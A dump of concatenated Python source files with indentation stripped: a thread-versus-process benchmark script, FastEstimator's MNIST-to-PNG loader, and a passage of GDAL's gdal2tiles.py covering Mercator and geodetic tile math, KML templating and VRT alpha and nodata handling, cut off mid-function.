with open(filepath, 'r') as f:
lines = f.readline()
def http_request():
try:
webpage = requests.get(url, headers = _head)
html = webpage.text
return {"context":html}
except Exception as e:
return {"error":e}
def io():
write()
read()
# single_Thread
def single_Thread_cpu():
t = time.time()
for x in range(10):
count(1,1)
print("single cpu", time.time()-t)
def single_Thread_io():
t = time.time()
for x in range(10):
write()
read()
print("single io", time.time()-t)
def single_Thread_http():
t = time.time()
for x in range(10):
http_request()
print("single http", time.time()-t)
# mul__Thread
def mul_Thread_cpu():
counts = []
t = time.time()
for x in range(10):
thread = Thread(target=count,args=(1,1))
counts.append(thread)
thread.start()
e = counts.__len__()
while True:
for th in counts:
if not th.is_alive():
e -= 1
if e <= 0:
break
print("mul cpu",time.time() - t)
def mul_Thread_io():
ios = []
t = time.time()
for x in range(10):
thread = Thread(target=io)
ios.append(thread)
thread.start()
e = ios.__len__()
while True:
for th in ios:
if not th.is_alive():
e -= 1
if e < 0:
break
print("mul io",time.time() - t)
def mul_Thread_http():
https = []
t = time.time()
for x in range(10):
thread = Thread(target=http_request)
https.append(thread)
thread.start()
e = https.__len__()
while True:
for th in https:
if not th.is_alive():
e -=1
if e <= 0:
break
print("mul http",time.time() - t)
# mul_process
def mul_process_cpu():
counts = []
t = time.time()
for x in range(10):
p = Process(target=count, args=(1, 1))
counts.append(p)
p.start()
e = counts.__len__()
while True:
for th in counts:
if not th.is_alive():
e -= 1
if e <= 0:
break
print("Multiprocess cpu", time.time() - t)
def mul_process_io():
t = time.time()
ios = []
t = time.time()
for x in range(10):
p = Process(target=io)
ios.append(p)
p.start()
e = ios.__len__()
while True:
for th in ios:
if not th.is_alive():
e -= 1
if e <= 0:
break
print("Multiprocess IO", time.time() - t)
def mul_process_http():
t = time.time()
httprs = []
t = time.time()
for x in range(10):
p = Process(target=http_request)
httprs.append(p)
p.start()
e = httprs.__len__()
while True:
for th in httprs:
if not th.is_alive():
e -= 1
if e <= 0:
break
print("Multiprocess Http Request", time.time() - t)
if __name__ == '__main__':
# single_Thread
single_Thread_cpu()
single_Thread_io()
single_Thread_http()
# mul__Thread
mul_Thread_cpu()
mul_Thread_io()
mul_Thread_http()
# mul_process
mul_process_cpu()
mul_process_io()
mul_process_http()
print("__file__=%s" % __file__)
print("os.path.realpath(__file__)=%s" % os.path.realpath(__file__))
print("os.path.dirname(os.path.realpath(__file__))=%s" % os.path.dirname(os.path.realpath(__file__)))
print("os.path.split(os.path.realpath(__file__))=%s" % os.path.split(os.path.realpath(__file__))[0])
print("os.path.abspath(__file__)=%s" % os.path.abspath(__file__))
print("os.getcwd()=%s" % os.getcwd())
print("sys.path[0]=%s" % sys.path[0])
print("sys.argv[0]=%s" % sys.argv[0])
|
mnist.py
|
# Copyright 2019 The FastEstimator Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import multiprocessing as mp
import os
import tempfile
import pandas as pd
import tensorflow as tf
from PIL import Image
def write_images_serial(start_idx, end_idx, data, image_path, mode):
for i in range(start_idx, end_idx):
img = Image.fromarray(data[i])
img.save(os.path.join(image_path, "{}_{}.png".format(mode, i)))
def write_images_parallel(x, image_path, mode):
num_cpu = mp.cpu_count()
num_example = x.shape[0]
example_per_cpu = num_example // num_cpu
processes = []
for rank in range(num_cpu):
start_idx = rank * example_per_cpu
if rank == num_cpu - 1:
end_idx = num_example
else:
end_idx = start_idx + example_per_cpu
processes.append(mp.Process(target=write_images_serial, args=(start_idx, end_idx, x, image_path, mode)))
for p in processes:
p.start()
p.join()
def write_csv(y, csv_path, mode):
x_names = []
y_names = []
num_example = len(y)
for idx in range(num_example):
x_names.append(os.path.join("image", "{}_{}.png".format(mode, idx)))
y_names.append(y[idx])
df = pd.DataFrame(data={'x': x_names, 'y': y_names})
df.to_csv(csv_path, index=False)
def load_data(path=None):
if path is None:
path = os.path.join(tempfile.gettempdir(), ".fe", "Mnist")
if not os.path.exists(path):
os.makedirs(path)
image_path = os.path.join(path, "image")
(x_train, y_train), (x_test, y_test) = tf.keras.datasets.mnist.load_data()
train_csv_path = os.path.join(path, "train.csv")
eval_csv_path = os.path.join(path, "eval.csv")
if not os.path.exists(image_path):
print("writing image data to {}".format(image_path))
os.makedirs(image_path)
write_images_parallel(x_train, image_path, "train")
write_images_parallel(x_test, image_path, "eval")
if not os.path.exists(train_csv_path):
write_csv(y_train, train_csv_path, "train")
if not os.path.exists(eval_csv_path):
write_csv(y_test, eval_csv_path, "eval")
return train_csv_path, eval_csv_path, path
|
gdal2tiles.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# ******************************************************************************
# $Id$
#
# Project: Google Summer of Code 2007, 2008 (http://code.google.com/soc/)
# Support: BRGM (http://www.brgm.fr)
# Purpose: Convert a raster into TMS (Tile Map Service) tiles in a directory.
# - generate Google Earth metadata (KML SuperOverlay)
# - generate simple HTML viewer based on Google Maps and OpenLayers
# - support of global tiles (Spherical Mercator) for compatibility
# with interactive web maps a la Google Maps
# Author: Klokan Petr Pridal, klokan at klokan dot cz
# Web: http://www.klokan.cz/projects/gdal2tiles/
# GUI: http://www.maptiler.org/
#
###############################################################################
# Copyright (c) 2008, Klokan Petr Pridal
# Copyright (c) 2010-2013, Even Rouault <even dot rouault at mines-paris dot org>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
# ******************************************************************************
from __future__ import print_function, division
import math
from multiprocessing import Pipe, Pool, Process, Manager
import os
import tempfile
import threading
import shutil
import sys
from uuid import uuid4
from xml.etree import ElementTree
from osgeo import gdal
from osgeo import osr
try:
from PIL import Image
import numpy
import osgeo.gdal_array as gdalarray
numpy_available = True
except ImportError:
# 'antialias' resampling is not available
numpy_available = False
__version__ = "$Id$"
resampling_list = ('average', 'near', 'bilinear', 'cubic', 'cubicspline', 'lanczos', 'antialias')
profile_list = ('mercator', 'geodetic', 'raster')
webviewer_list = ('all', 'google', 'openlayers', 'leaflet', 'none')
threadLocal = threading.local()
# =============================================================================
# =============================================================================
# =============================================================================
__doc__globalmaptiles = """
globalmaptiles.py
Global Map Tiles as defined in Tile Map Service (TMS) Profiles
==============================================================
Functions necessary for generation of global tiles used on the web.
It contains classes implementing coordinate conversions for:
- GlobalMercator (based on EPSG:3857)
for Google Maps, Yahoo Maps, Bing Maps compatible tiles
- GlobalGeodetic (based on EPSG:4326)
for OpenLayers Base Map and Google Earth compatible tiles
More info at:
http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification
http://wiki.osgeo.org/wiki/WMS_Tiling_Client_Recommendation
http://msdn.microsoft.com/en-us/library/bb259689.aspx
http://code.google.com/apis/maps/documentation/overlays.html#Google_Maps_Coordinates
Created by Klokan Petr Pridal on 2008-07-03.
Google Summer of Code 2008, project GDAL2Tiles for OSGEO.
In case you use this class in your product, translate it to another language
or find it useful for your project please let me know.
My email: klokan at klokan dot cz.
I would like to know where it was used.
Class is available under the open-source GDAL license (www.gdal.org).
"""
MAXZOOMLEVEL = 32
class GlobalMercator(object):
r"""
TMS Global Mercator Profile
---------------------------
Functions necessary for generation of tiles in Spherical Mercator projection,
EPSG:3857.
Such tiles are compatible with Google Maps, Bing Maps, Yahoo Maps,
UK Ordnance Survey OpenSpace API, ...
and you can overlay them on top of base maps of those web mapping applications.
Pixel and tile coordinates are in TMS notation (origin [0,0] in bottom-left).
What coordinate conversions do we need for TMS Global Mercator tiles::
LatLon <-> Meters <-> Pixels <-> Tile
WGS84 coordinates Spherical Mercator Pixels in pyramid Tiles in pyramid
lat/lon XY in meters XY pixels Z zoom XYZ from TMS
EPSG:4326 EPSG:387
.----. --------- -- TMS
/ \ <-> | | <-> /----/ <-> Google
\ / | | /--------/ QuadTree
----- --------- /------------/
KML, public WebMapService Web Clients TileMapService
What is the coordinate extent of Earth in EPSG:3857?
[-20037508.342789244, -20037508.342789244, 20037508.342789244, 20037508.342789244]
Constant 20037508.342789244 comes from the circumference of the Earth in meters,
which is 40 thousand kilometers, the coordinate origin is in the middle of extent.
In fact you can calculate the constant as: 2 * math.pi * 6378137 / 2.0
$ echo 180 85 | gdaltransform -s_srs EPSG:4326 -t_srs EPSG:3857
Polar areas with abs(latitude) bigger then 85.05112878 are clipped off.
What are zoom level constants (pixels/meter) for pyramid with EPSG:3857?
whole region is on top of pyramid (zoom=0) covered by 256x256 pixels tile,
every lower zoom level resolution is always divided by two
initialResolution = 20037508.342789244 * 2 / 256 = 156543.03392804062
What is the difference between TMS and Google Maps/QuadTree tile name convention?
The tile raster itself is the same (equal extent, projection, pixel size),
there is just different identification of the same raster tile.
Tiles in TMS are counted from [0,0] in the bottom-left corner, id is XYZ.
Google placed the origin [0,0] to the top-left corner, reference is XYZ.
Microsoft is referencing tiles by a QuadTree name, defined on the website:
http://msdn2.microsoft.com/en-us/library/bb259689.aspx
The lat/lon coordinates are using WGS84 datum, yes?
Yes, all lat/lon we are mentioning should use WGS84 Geodetic Datum.
Well, the web clients like Google Maps are projecting those coordinates by
Spherical Mercator, so in fact lat/lon coordinates on sphere are treated as if
the were on the WGS84 ellipsoid.
From MSDN documentation:
To simplify the calculations, we use the spherical form of projection, not
the ellipsoidal form. Since the projection is used only for map display,
and not for displaying numeric coordinates, we don't need the extra precision
of an ellipsoidal projection. The spherical projection causes approximately
0.33 percent scale distortion in the Y direction, which is not visually
noticeable.
How do I create a raster in EPSG:3857 and convert coordinates with PROJ.4?
You can use standard GIS tools like gdalwarp, cs2cs or gdaltransform.
All of the tools supports -t_srs 'epsg:3857'.
For other GIS programs check the exact definition of the projection:
More info at http://spatialreference.org/ref/user/google-projection/
The same projection is designated as EPSG:3857. WKT definition is in the
official EPSG database.
Proj4 Text:
+proj=merc +a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0 +x_0=0.0 +y_0=0
+k=1.0 +units=m +nadgrids=@null +no_defs
Human readable WKT format of EPSG:3857:
PROJCS["Google Maps Global Mercator",
GEOGCS["WGS 84",
DATUM["WGS_1984",
SPHEROID["WGS 84",6378137,298.257223563,
AUTHORITY["EPSG","7030"]],
AUTHORITY["EPSG","6326"]],
PRIMEM["Greenwich",0],
UNIT["degree",0.0174532925199433],
AUTHORITY["EPSG","4326"]],
PROJECTION["Mercator_1SP"],
PARAMETER["central_meridian",0],
PARAMETER["scale_factor",1],
PARAMETER["false_easting",0],
PARAMETER["false_northing",0],
UNIT["metre",1,
AUTHORITY["EPSG","9001"]]]
"""
def __init__(self, tile_size=256):
"Initialize the TMS Global Mercator pyramid"
self.tile_size = tile_size
self.initialResolution = 2 * math.pi * 6378137 / self.tile_size
# 156543.03392804062 for tile_size 256 pixels
self.originShift = 2 * math.pi * 6378137 / 2.0
# 20037508.342789244
def LatLonToMeters(self, lat, lon):
"Converts given lat/lon in WGS84 Datum to XY in Spherical Mercator EPSG:3857"
mx = lon * self.originShift / 180.0
my = math.log(math.tan((90 + lat) * math.pi / 360.0)) / (math.pi / 180.0)
my = my * self.originShift / 180.0
return mx, my
def MetersToLatLon(self, mx, my):
"Converts XY point from Spherical Mercator EPSG:3857 to lat/lon in WGS84 Datum"
lon = (mx / self.originShift) * 180.0
lat = (my / self.originShift) * 180.0
lat = 180 / math.pi * (2 * math.atan(math.exp(lat * math.pi / 180.0)) - math.pi / 2.0)
return lat, lon
def PixelsToMeters(self, px, py, zoom):
"Converts pixel coordinates in given zoom level of pyramid to EPSG:3857"
res = self.Resolution(zoom)
mx = px * res - self.originShift
my = py * res - self.originShift
return mx, my
def MetersToPixels(self, mx, my, zoom):
"Converts EPSG:3857 to pyramid pixel coordinates in given zoom level"
res = self.Resolution(zoom)
px = (mx + self.originShift) / res
py = (my + self.originShift) / res
return px, py
def PixelsToTile(self, px, py):
"Returns a tile covering region in given pixel coordinates"
tx = int(math.ceil(px / float(self.tile_size)) - 1)
ty = int(math.ceil(py / float(self.tile_size)) - 1)
return tx, ty
def PixelsToRaster(self, px, py, zoom):
"Move the origin of pixel coordinates to top-left corner"
mapSize = self.tile_size << zoom
return px, mapSize - py
def MetersToTile(self, mx, my, zoom):
"Returns tile for given mercator coordinates"
px, py = self.MetersToPixels(mx, my, zoom)
return self.PixelsToTile(px, py)
def TileBounds(self, tx, ty, zoom):
"Returns bounds of the given tile in EPSG:3857 coordinates"
minx, miny = self.PixelsToMeters(tx * self.tile_size, ty * self.tile_size, zoom)
maxx, maxy = self.PixelsToMeters((tx + 1) * self.tile_size, (ty + 1) * self.tile_size, zoom)
return (minx, miny, maxx, maxy)
def TileLatLonBounds(self, tx, ty, zoom):
"Returns bounds of the given tile in latitude/longitude using WGS84 datum"
bounds = self.TileBounds(tx, ty, zoom)
minLat, minLon = self.MetersToLatLon(bounds[0], bounds[1])
maxLat, maxLon = self.MetersToLatLon(bounds[2], bounds[3])
return (minLat, minLon, maxLat, maxLon)
def Resolution(self, zoom):
"Resolution (meters/pixel) for given zoom level (measured at Equator)"
# return (2 * math.pi * 6378137) / (self.tile_size * 2**zoom)
return self.initialResolution / (2**zoom)
def ZoomForPixelSize(self, pixelSize):
"Maximal scaledown zoom of the pyramid closest to the pixelSize."
for i in range(MAXZOOMLEVEL):
if pixelSize > self.Resolution(i):
return max(0, i - 1) # We don't want to scale up
return MAXZOOMLEVEL - 1
def GoogleTile(self, tx, ty, zoom):
"Converts TMS tile coordinates to Google Tile coordinates"
# coordinate origin is moved from bottom-left to top-left corner of the extent
return tx, (2**zoom - 1) - ty
def QuadTree(self, tx, ty, zoom):
"Converts TMS tile coordinates to Microsoft QuadTree"
quadKey = ""
ty = (2**zoom - 1) - ty
for i in range(zoom, 0, -1):
digit = 0
mask = 1 << (i - 1)
if (tx & mask) != 0:
digit += 1
if (ty & mask) != 0:
digit += 2
quadKey += str(digit)
return quadKey
class GlobalGeodetic(object):
r"""
TMS Global Geodetic Profile
---------------------------
Functions necessary for generation of global tiles in Plate Carre projection,
EPSG:4326, "unprojected profile".
Such tiles are compatible with Google Earth (as any other EPSG:4326 rasters)
and you can overlay the tiles on top of OpenLayers base map.
Pixel and tile coordinates are in TMS notation (origin [0,0] in bottom-left).
What coordinate conversions do we need for TMS Global Geodetic tiles?
Global Geodetic tiles are using geodetic coordinates (latitude,longitude)
directly as planar coordinates XY (it is also called Unprojected or Plate
Carre). We need only scaling to pixel pyramid and cutting to tiles.
Pyramid has on top level two tiles, so it is not square but rectangle.
Area [-180,-90,180,90] is scaled to 512x256 pixels.
TMS has coordinate origin (for pixels and tiles) in bottom-left corner.
Rasters are in EPSG:4326 and therefore are compatible with Google Earth.
LatLon <-> Pixels <-> Tiles
WGS84 coordinates Pixels in pyramid Tiles in pyramid
lat/lon XY pixels Z zoom XYZ from TMS
EPSG:4326
.----. ----
/ \ <-> /--------/ <-> TMS
\ / /--------------/
----- /--------------------/
WMS, KML Web Clients, Google Earth TileMapService
"""
def __init__(self, tmscompatible, tile_size=256):
self.tile_size = tile_size
if tmscompatible is not None:
# Defaults the resolution factor to 0.703125 (2 tiles @ level 0)
# Adhers to OSGeo TMS spec
# http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification#global-geodetic
self.resFact = 180.0 / self.tile_size
else:
# Defaults the resolution factor to 1.40625 (1 tile @ level 0)
# Adheres OpenLayers, MapProxy, etc default resolution for WMTS
self.resFact = 360.0 / self.tile_size
def LonLatToPixels(self, lon, lat, zoom):
"Converts lon/lat to pixel coordinates in given zoom of the EPSG:4326 pyramid"
res = self.resFact / 2**zoom
px = (180 + lon) / res
py = (90 + lat) / res
return px, py
def PixelsToTile(self, px, py):
"Returns coordinates of the tile covering region in pixel coordinates"
tx = int(math.ceil(px / float(self.tile_size)) - 1)
ty = int(math.ceil(py / float(self.tile_size)) - 1)
return tx, ty
def LonLatToTile(self, lon, lat, zoom):
"Returns the tile for zoom which covers given lon/lat coordinates"
px, py = self.LonLatToPixels(lon, lat, zoom)
return self.PixelsToTile(px, py)
def Resolution(self, zoom):
"Resolution (arc/pixel) for given zoom level (measured at Equator)"
return self.resFact / 2**zoom
def ZoomForPixelSize(self, pixelSize):
"Maximal scaledown zoom of the pyramid closest to the pixelSize."
for i in range(MAXZOOMLEVEL):
if pixelSize > self.Resolution(i):
return max(0, i - 1) # We don't want to scale up
return MAXZOOMLEVEL - 1
def TileBounds(self, tx, ty, zoom):
"Returns bounds of the given tile"
res = self.resFact / 2**zoom
return (
tx * self.tile_size * res - 180,
ty * self.tile_size * res - 90,
(tx + 1) * self.tile_size * res - 180,
(ty + 1) * self.tile_size * res - 90
)
def TileLatLonBounds(self, tx, ty, zoom):
"Returns bounds of the given tile in the SWNE form"
b = self.TileBounds(tx, ty, zoom)
return (b[1], b[0], b[3], b[2])
class Zoomify(object):
"""
Tiles compatible with the Zoomify viewer
----------------------------------------
"""
def __init__(self, width, height, tile_size=256, tileformat='jpg'):
"""Initialization of the Zoomify tile tree"""
self.tile_size = tile_size
self.tileformat = tileformat
imagesize = (width, height)
tiles = (math.ceil(width / tile_size), math.ceil(height / tile_size))
# Size (in tiles) for each tier of pyramid.
self.tierSizeInTiles = []
self.tierSizeInTiles.append(tiles)
# Image size in pixels for each pyramid tierself
self.tierImageSize = []
self.tierImageSize.append(imagesize)
while (imagesize[0] > tile_size or imagesize[1] > tile_size):
imagesize = (math.floor(imagesize[0] / 2), math.floor(imagesize[1] / 2))
tiles = (math.ceil(imagesize[0] / tile_size), math.ceil(imagesize[1] / tile_size))
self.tierSizeInTiles.append(tiles)
self.tierImageSize.append(imagesize)
self.tierSizeInTiles.reverse()
self.tierImageSize.reverse()
# Depth of the Zoomify pyramid, number of tiers (zoom levels)
self.numberOfTiers = len(self.tierSizeInTiles)
# Number of tiles up to the given tier of pyramid.
self.tileCountUpToTier = []
self.tileCountUpToTier[0] = 0
for i in range(1, self.numberOfTiers + 1):
self.tileCountUpToTier.append(
self.tierSizeInTiles[i - 1][0] * self.tierSizeInTiles[i - 1][1] +
self.tileCountUpToTier[i - 1]
)
def tilefilename(self, x, y, z):
"""Returns filename for tile with given coordinates"""
tileIndex = x + y * self.tierSizeInTiles[z][0] + self.tileCountUpToTier[z]
return os.path.join("TileGroup%.0f" % math.floor(tileIndex / 256),
"%s-%s-%s.%s" % (z, x, y, self.tileformat))
class GDALError(Exception):
pass
def exit_with_error(message, details=""):
# Message printing and exit code kept from the way it worked using the OptionParser (in case
# someone parses the error output)
sys.stderr.write("Usage: gdal2tiles.py [options] input_file [output]\n\n")
sys.stderr.write("gdal2tiles.py: error: %s\n" % message)
if details:
sys.stderr.write("\n\n%s\n" % details)
sys.exit(2)
def generate_kml(tx, ty, tz, tileext, tile_size, tileswne, options, children=None, **args):
"""
Template for the KML. Returns filled string.
"""
if not children:
children = []
args['tx'], args['ty'], args['tz'] = tx, ty, tz
args['tileformat'] = tileext
if 'tile_size' not in args:
args['tile_size'] = tile_size
if 'minlodpixels' not in args:
args['minlodpixels'] = int(args['tile_size'] / 2)
if 'maxlodpixels' not in args:
args['maxlodpixels'] = int(args['tile_size'] * 8)
if children == []:
args['maxlodpixels'] = -1
if tx is None:
tilekml = False
args['title'] = options.title
else:
tilekml = True
args['title'] = "%d/%d/%d.kml" % (tz, tx, ty)
args['south'], args['west'], args['north'], args['east'] = tileswne(tx, ty, tz)
if tx == 0:
args['drawOrder'] = 2 * tz + 1
elif tx is not None:
args['drawOrder'] = 2 * tz
else:
args['drawOrder'] = 0
url = options.url
if not url:
if tilekml:
url = "../../"
else:
url = ""
s = """<?xml version="1.0" encoding="utf-8"?>
<kml xmlns="http://www.opengis.net/kml/2.2">
<Document>
<name>%(title)s</name>
<description></description>
<Style>
<ListStyle id="hideChildren">
<listItemType>checkHideChildren</listItemType>
</ListStyle>
</Style>""" % args
if tilekml:
s += """
<Region>
<LatLonAltBox>
<north>%(north).14f</north>
<south>%(south).14f</south>
<east>%(east).14f</east>
<west>%(west).14f</west>
</LatLonAltBox>
<Lod>
<minLodPixels>%(minlodpixels)d</minLodPixels>
<maxLodPixels>%(maxlodpixels)d</maxLodPixels>
</Lod>
</Region>
<GroundOverlay>
<drawOrder>%(drawOrder)d</drawOrder>
<Icon>
<href>%(ty)d.%(tileformat)s</href>
</Icon>
<LatLonBox>
<north>%(north).14f</north>
<south>%(south).14f</south>
<east>%(east).14f</east>
<west>%(west).14f</west>
</LatLonBox>
</GroundOverlay>
""" % args
for cx, cy, cz in children:
csouth, cwest, cnorth, ceast = tileswne(cx, cy, cz)
s += """
<NetworkLink>
<name>%d/%d/%d.%s</name>
<Region>
<LatLonAltBox>
<north>%.14f</north>
<south>%.14f</south>
<east>%.14f</east>
<west>%.14f</west>
</LatLonAltBox>
<Lod>
<minLodPixels>%d</minLodPixels>
<maxLodPixels>-1</maxLodPixels>
</Lod>
</Region>
<Link>
<href>%s%d/%d/%d.kml</href>
<viewRefreshMode>onRegion</viewRefreshMode>
<viewFormat/>
</Link>
</NetworkLink>
""" % (cz, cx, cy, args['tileformat'], cnorth, csouth, ceast, cwest,
args['minlodpixels'], url, cz, cx, cy)
s += """ </Document>
</kml>
"""
return s
def scale_query_to_tile(dsquery, dstile, tiledriver, options, tilefilename=''):
"""Scales down query dataset to the tile dataset"""
querysize = dsquery.RasterXSize
tile_size = dstile.RasterXSize
tilebands = dstile.RasterCount
if options.resampling == 'average':
# Function: gdal.RegenerateOverview()
for i in range(1, tilebands + 1):
# Black border around NODATA
res = gdal.RegenerateOverview(dsquery.GetRasterBand(i), dstile.GetRasterBand(i),
'average')
if res != 0:
exit_with_error("RegenerateOverview() failed on %s, error %d" % (
tilefilename, res))
elif options.resampling == 'antialias' and numpy_available:
# Scaling by PIL (Python Imaging Library) - improved Lanczos
array = numpy.zeros((querysize, querysize, tilebands), numpy.uint8)
for i in range(tilebands):
array[:, :, i] = gdalarray.BandReadAsArray(dsquery.GetRasterBand(i + 1),
0, 0, querysize, querysize)
im = Image.fromarray(array, 'RGBA') # Always four bands
im1 = im.resize((tile_size, tile_size), Image.ANTIALIAS)
if os.path.exists(tilefilename):
im0 = Image.open(tilefilename)
im1 = Image.composite(im1, im0, im1)
im1.save(tilefilename, tiledriver)
else:
if options.resampling == 'near':
gdal_resampling = gdal.GRA_NearestNeighbour
elif options.resampling == 'bilinear':
gdal_resampling = gdal.GRA_Bilinear
elif options.resampling == 'cubic':
gdal_resampling = gdal.GRA_Cubic
elif options.resampling == 'cubicspline':
gdal_resampling = gdal.GRA_CubicSpline
elif options.resampling == 'lanczos':
gdal_resampling = gdal.GRA_Lanczos
# Other algorithms are implemented by gdal.ReprojectImage().
dsquery.SetGeoTransform((0.0, tile_size / float(querysize), 0.0, 0.0, 0.0,
tile_size / float(querysize)))
dstile.SetGeoTransform((0.0, 1.0, 0.0, 0.0, 0.0, 1.0))
res = gdal.ReprojectImage(dsquery, dstile, None, None, gdal_resampling)
if res != 0:
exit_with_error("ReprojectImage() failed on %s, error %d" % (tilefilename, res))
def setup_no_data_values(input_dataset, options):
"""
Extract the NODATA values from the dataset or use the passed arguments as override if any
"""
in_nodata = []
if options.srcnodata:
nds = list(map(float, options.srcnodata.split(',')))
if len(nds) < input_dataset.RasterCount:
in_nodata = (nds * input_dataset.RasterCount)[:input_dataset.RasterCount]
else:
in_nodata = nds
else:
for i in range(1, input_dataset.RasterCount + 1):
raster_no_data = input_dataset.GetRasterBand(i).GetNoDataValue()
if raster_no_data is not None:
in_nodata.append(raster_no_data)
if options.verbose:
print("NODATA: %s" % in_nodata)
return in_nodata
def setup_input_srs(input_dataset, options):
"""
Determines and returns the Input Spatial Reference System (SRS) as an osr object and as a
WKT representation
Uses in priority the one passed in the command line arguments. If None, tries to extract them
from the input dataset
"""
input_srs = None
input_srs_wkt = None
if options.s_srs:
input_srs = osr.SpatialReference()
input_srs.SetFromUserInput(options.s_srs)
input_srs_wkt = input_srs.ExportToWkt()
else:
input_srs_wkt = input_dataset.GetProjection()
if not input_srs_wkt and input_dataset.GetGCPCount() != 0:
input_srs_wkt = input_dataset.GetGCPProjection()
if input_srs_wkt:
input_srs = osr.SpatialReference()
input_srs.ImportFromWkt(input_srs_wkt)
return input_srs, input_srs_wkt
def setup_output_srs(input_srs, options):
"""
Setup the desired SRS (based on options)
"""
output_srs = osr.SpatialReference()
if options.profile == 'mercator':
output_srs.ImportFromEPSG(3857)
elif options.profile == 'geodetic':
output_srs.ImportFromEPSG(4326)
else:
output_srs = input_srs
return output_srs
def has_georeference(dataset):
return (dataset.GetGeoTransform() != (0.0, 1.0, 0.0, 0.0, 0.0, 1.0) or
dataset.GetGCPCount() != 0)
def reproject_dataset(from_dataset, from_srs, to_srs, options=None):
"""
Returns the input dataset in the expected "destination" SRS.
If the dataset is already in the correct SRS, returns it unmodified
"""
if not from_srs or not to_srs:
raise GDALError("from and to SRS must be defined to reproject the dataset")
if (from_srs.ExportToProj4() != to_srs.ExportToProj4()) or (from_dataset.GetGCPCount() != 0):
to_dataset = gdal.AutoCreateWarpedVRT(from_dataset,
from_srs.ExportToWkt(), to_srs.ExportToWkt())
if options and options.verbose:
print("Warping of the raster by AutoCreateWarpedVRT (result saved into 'tiles.vrt')")
to_dataset.GetDriver().CreateCopy("tiles.vrt", to_dataset)
return to_dataset
else:
return from_dataset
def add_gdal_warp_options_to_string(vrt_string, warp_options):
if not warp_options:
return vrt_string
vrt_root = ElementTree.fromstring(vrt_string)
options = vrt_root.find("GDALWarpOptions")
if options is None:
return vrt_string
for key, value in warp_options.items():
tb = ElementTree.TreeBuilder()
tb.start("Option", {"name": key})
tb.data(value)
tb.end("Option")
elem = tb.close()
options.insert(0, elem)
return ElementTree.tostring(vrt_root).decode()
def update_no_data_values(warped_vrt_dataset, nodata_values, options=None):
"""
Takes an array of NODATA values and forces them on the WarpedVRT file dataset passed
"""
# TODO: gbataille - Seems that I forgot tests there
assert nodata_values != []
vrt_string = warped_vrt_dataset.GetMetadata("xml:VRT")[0]
vrt_string = add_gdal_warp_options_to_string(
vrt_string, {"INIT_DEST": "NO_DATA", "UNIFIED_SRC_NODATA": "YES"})
# TODO: gbataille - check the need for this replacement. Seems to work without
# # replace BandMapping tag for NODATA bands....
# for i in range(len(nodata_values)):
# s = s.replace(
# '<BandMapping src="%i" dst="%i"/>' % ((i+1), (i+1)),
# """
# <BandMapping src="%i" dst="%i">
# <SrcNoDataReal>%i</SrcNoDataReal>
# <SrcNoDataImag>0</SrcNoDataImag>
# <DstNoDataReal>%i</DstNoDataReal>
# <DstNoDataImag>0</DstNoDataImag>
# </BandMapping>
# """ % ((i+1), (i+1), nodata_values[i], nodata_values[i]))
corrected_dataset = gdal.Open(vrt_string)
# set NODATA_VALUE metadata
corrected_dataset.SetMetadataItem(
'NODATA_VALUES', ' '.join([str(i) for i in nodata_values]))
if options and options.verbose:
print("Modified warping result saved into 'tiles1.vrt'")
with open("tiles1.vrt", "w") as f:
f.write(corrected_dataset.GetMetadata("xml:VRT")[0])
return corrected_dataset
def add_alpha_band_to_string_vrt(vrt_string):
# TODO: gbataille - Old code speak of this being equivalent to gdalwarp -dstalpha
# To be checked
vrt_root = ElementTree.fromstring(vrt_string)
index = 0
nb_bands = 0
for subelem in list(vrt_root):
if subelem.tag == "VRTRasterBand":
nb_bands += 1
color_node = subelem.find("./ColorInterp")
if color_node is not None and color_node.text == "Alpha":
raise Exception("Alpha band already present")
else:
if nb_bands:
# This means that we are one element after the Band definitions
break
index += 1
tb = ElementTree.TreeBuilder()
tb.start("VRTRasterBand",
{'dataType': "Byte", "band": str(nb_bands + 1), "subClass": "VRTWarpedRasterBand"})
tb.start("ColorInterp", {})
tb.data("Alpha")
tb.end("ColorInterp")
tb.end("VRTRasterBand")
elem = tb.close()
vrt_root.insert(index, elem)
warp_options = vrt_root.find(".//GDALWarpOptions")
tb = ElementTree.TreeBuilder()
tb.start("DstAlphaBand", {})
tb.data(str(nb_bands + 1))
tb.end("DstAlphaBand")
elem = tb.close()
warp_options.append(elem)
# TODO: gbataille - this is a GDALWarpOptions. Why put it in a specific place?
tb = ElementTree.TreeBuilder()
tb.start("Option", {"name": "INIT_DEST"})
tb.data("0")
tb.end("Option")
elem = tb.close()
warp_options.append(elem)
return ElementTree.tostring(vrt_root).decode()
def update_alpha_value_for_non_alpha_inputs(warped_vrt_dataset, options=None):
"""
Handles dataset with 1 or 3 bands, i.e. without alpha channel, in the case the nodata value has
not been forced by options
"""
if warped_vrt_dataset.RasterCount in [1, 3]:
vrt_string = warped_vrt_dataset.GetMetadata("xml:VRT")[0]
vrt_string = add_alpha_band_to_string_vrt(vrt_string)
warped_vrt_dataset = gdal.Open(vrt_string)
